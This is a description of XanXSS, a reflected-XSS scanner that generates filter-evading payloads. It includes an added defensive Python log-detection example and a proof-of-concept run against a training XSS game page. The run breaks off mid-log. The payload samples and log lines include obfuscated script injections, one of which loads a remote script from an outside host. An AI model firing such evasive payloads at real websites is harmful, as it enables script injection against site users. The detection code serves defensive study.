XanXSS - A Simple XSS Finding Tool

XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based on templates. Unlike other XSS scanners that just run through a list of payloads, XanXSS tries to make the payload unidentifiable, for example:
 Src= [2].Find(CoNfirm);= "JAVaScRIpT:proMpT(1))"javAscrIpt:/*--> />cLIcK
Me!
With XanXSS every payload is different. XanXSS works by running through the payloads until a specified number is found or a timer hits the max time; this prevents it from looping for too long. Some of the features included in XanXSS:
  • Ability to pass your own headers using -H
  • Ability to generate a polyglot script using -P
  • Ability to run behind a proxy using --proxy
  • And many more
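
Because every payload varies its letter case and encoding, a literal string filter on the receiving side will not recognize these requests. The following added example (not part of XanXSS or of the original page) shows log triage that canonicalizes the `query` parameter before matching; the signature set, the function names and the access-log lines are constructed assumptions.

```python
import html
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Lower-case signatures: illustrative heuristics only, meant to run on normalized text.
SIGNATURES = {
    "script-scheme": re.compile(r"javascript:"),
    "dialog-call": re.compile(r"(?:alert|prompt|confirm)[(`]"),
    "event-handler": re.compile(r"\bon[a-z]+="),
    "script-tag": re.compile(r"<script\b"),
}

def normalize(value, max_rounds=3):
    """Peel layered URL/entity encoding, drop whitespace and control bytes, fold case."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return re.sub(r"[\x00-\x20]+", "", value).lower()

def hits(value, canonical=True):
    """Names of matching signatures; canonical=False mimics a literal string filter."""
    text = normalize(value) if canonical else value
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def flag_requests(log_lines, param="query"):
    """Return (line_number, signature_names) for requests whose `param` looks like a probe."""
    flagged = []
    for number, line in enumerate(log_lines, start=1):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        query = urlsplit(match.group(1)).query if match else ""
        for key, value in parse_qsl(query):  # parse_qsl already decodes one layer
            found = hits(value) if key == param else []
            if found:
                flagged.append((number, found))
    return flagged

# Constructed access-log lines (not from the page); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:16:37:34 +0000] "GET /level1/frame?query=timer HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:16:37:34 +0000] "GET /level1/frame?query=JAVaScRIpT:proMpT(1) HTTP/1.1" 200 530',
    '203.0.113.7 - - [01/Jan/2024:16:37:35 +0000] "GET /level1/frame?query=%253CsCrIpT%253EaLeRt%25281%2529 HTTP/1.1" 200 541',
    '203.0.113.9 - - [01/Jan/2024:16:40:02 +0000] "GET /level1/frame?query=please+confirm+order HTTP/1.1" 200 520',
]

if __name__ == "__main__":
    for number, found in flag_requests(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

Matching of this kind only supports detection; the reflected value still needs context-aware output encoding on the server.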

Proof of Concept
For this proof of concept we will use https://xss-game.appspot.com/level1/frame
admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v

    ____  ___             ____  ___  _________ _________
    \   \/  /____    ____ \   \/  / /   _____//   _____/
     \     /\__  \  /    \ \     /  \_____  \ \_____  \
     /     \ / __ \|   |  \/     \  /        \/        \
    /___/\  (____  /___|  /___/\  \/_______  /_______  /
          \_/    \/     \/      \_/        \/        \/
  Twitter->   @stay__salty
  Github -->  ekultek
  Version---> v(0.1)

[info][16:37:34] using default payloads
[info][16:37:34] generating payloads
[info][16:37:34] running payloads through tampering procedures
[info][16:37:34] payloads tampered successfully
[info][16:37:34] running payloads
[debug][16:37:34] running payload ''
[debug][16:37:34] running payload 'Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*-->'
[debug][16:37:34] running payload ''
[debug][16:37:34] running payload ''
[debug][16:37:34] running payload ''
[debug][16:37:35] running payload ''
[debug][16:37:35] running payload '